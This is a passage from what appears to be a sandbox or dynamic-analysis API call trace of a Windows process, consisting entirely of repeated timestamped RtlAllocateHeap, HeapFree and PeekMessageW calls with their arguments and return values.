Size=0x820) returned 0x2d154b0 [0188.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.010] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0188.010] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.048] RtlAllocateHeap (HeapHandle=0x6a0000, 